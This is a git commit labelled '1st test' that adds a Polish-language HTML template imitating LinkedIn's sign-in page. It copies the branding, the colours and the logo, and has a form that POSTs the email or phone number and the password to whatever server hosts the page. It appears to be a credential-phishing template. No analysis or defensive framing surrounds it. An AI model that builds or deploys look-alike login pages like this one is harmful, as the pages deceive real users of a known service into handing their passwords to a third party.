1st test
This commit is contained in:
169
templates/linkedin.html
Normal file
169
templates/linkedin.html
Normal file
@@ -0,0 +1,169 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="pl">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Zaloguj się | LinkedIn</title>
|
||||
<style>
|
||||
:root {
|
||||
--linkedin-blue: #0a66c2;
|
||||
--linkedin-hover-blue: #004182;
|
||||
--text-gray: rgba(0, 0, 0, 0.9);
|
||||
--subtext-gray: rgba(0, 0, 0, 0.6);
|
||||
--bg-light: #f3f2f0;
|
||||
}
|
||||
|
||||
body {
|
||||
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif;
|
||||
background-color: white;
|
||||
margin: 0;
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
min-height: 100vh;
|
||||
}
|
||||
|
||||
.header {
|
||||
padding: 20px 0 20px 50px;
|
||||
}
|
||||
|
||||
.logo-text {
|
||||
color: var(--linkedin-blue);
|
||||
font-weight: bold;
|
||||
font-size: 26px;
|
||||
letter-spacing: -1px;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
main {
|
||||
flex-grow: 1;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: flex-start;
|
||||
padding-top: 40px;
|
||||
}
|
||||
|
||||
.login-card {
|
||||
background: white;
|
||||
padding: 24px;
|
||||
width: 100%;
|
||||
max-width: 400px;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 12px rgba(0,0,0,0.15);
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 32px;
|
||||
font-weight: 600;
|
||||
color: var(--text-gray);
|
||||
margin-bottom: 4px;
|
||||
margin-top: 0;
|
||||
}
|
||||
|
||||
p.subtitle {
|
||||
font-size: 14px;
|
||||
color: var(--text-gray);
|
||||
margin-bottom: 24px;
|
||||
}
|
||||
|
||||
.form-group {
|
||||
margin-bottom: 16px;
|
||||
}
|
||||
|
||||
input {
|
||||
width: 100%;
|
||||
height: 48px;
|
||||
padding: 12px;
|
||||
font-size: 16px;
|
||||
border: 1px solid rgba(0,0,0,0.6);
|
||||
border-radius: 4px;
|
||||
box-sizing: border-box;
|
||||
transition: all 0.2s;
|
||||
}
|
||||
|
||||
input:focus {
|
||||
outline: 2px solid var(--linkedin-blue);
|
||||
border-color: transparent;
|
||||
}
|
||||
|
||||
.forgot-password {
|
||||
display: block;
|
||||
margin-top: 12px;
|
||||
color: var(--linkedin-blue);
|
||||
font-weight: 600;
|
||||
font-size: 16px;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.forgot-password:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
button {
|
||||
width: 100%;
|
||||
height: 48px;
|
||||
background-color: var(--linkedin-blue);
|
||||
color: white;
|
||||
border: none;
|
||||
border-radius: 24px; /* Zaokrąglone przyciski LinkedIn */
|
||||
font-size: 16px;
|
||||
font-weight: 600;
|
||||
cursor: pointer;
|
||||
margin-top: 24px;
|
||||
transition: background 0.2s;
|
||||
}
|
||||
|
||||
button:hover {
|
||||
background-color: var(--linkedin-hover-blue);
|
||||
}
|
||||
|
||||
.join-now {
|
||||
text-align: center;
|
||||
margin-top: 24px;
|
||||
font-size: 16px;
|
||||
color: var(--subtext-gray);
|
||||
}
|
||||
|
||||
.join-now a {
|
||||
color: var(--linkedin-blue);
|
||||
text-decoration: none;
|
||||
font-weight: 600;
|
||||
}
|
||||
|
||||
.join-now a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<header class="header">
|
||||
<a href="#" class="logo-text">Linked<span style="background: var(--linkedin-blue); color: white; padding: 0 4px; border-radius: 2px; margin-left: 2px;">in</span></a>
|
||||
</header>
|
||||
|
||||
<main>
|
||||
<div class="login-card">
|
||||
<h1>Zaloguj się</h1>
|
||||
<p class="subtitle">Bądź na bieżąco ze światem zawodowym</p>
|
||||
|
||||
<form method="POST">
|
||||
<div class="form-group">
|
||||
<input type="text" name="login" placeholder="Email lub telefon" required autofocus>
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<input type="password" name="password" placeholder="Hasło" required>
|
||||
</div>
|
||||
|
||||
<a href="#" class="forgot-password">Nie pamiętasz hasła?</a>
|
||||
|
||||
<button type="submit">Zaloguj się</button>
|
||||
</form>
|
||||
|
||||
<div class="join-now">
|
||||
Jesteś nowym użytkownikiem LinkedIn? <a href="#">Dołącz teraz</a>
|
||||
</div>
|
||||
</div>
|
||||
</main>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
Reference in New Issue
Block a user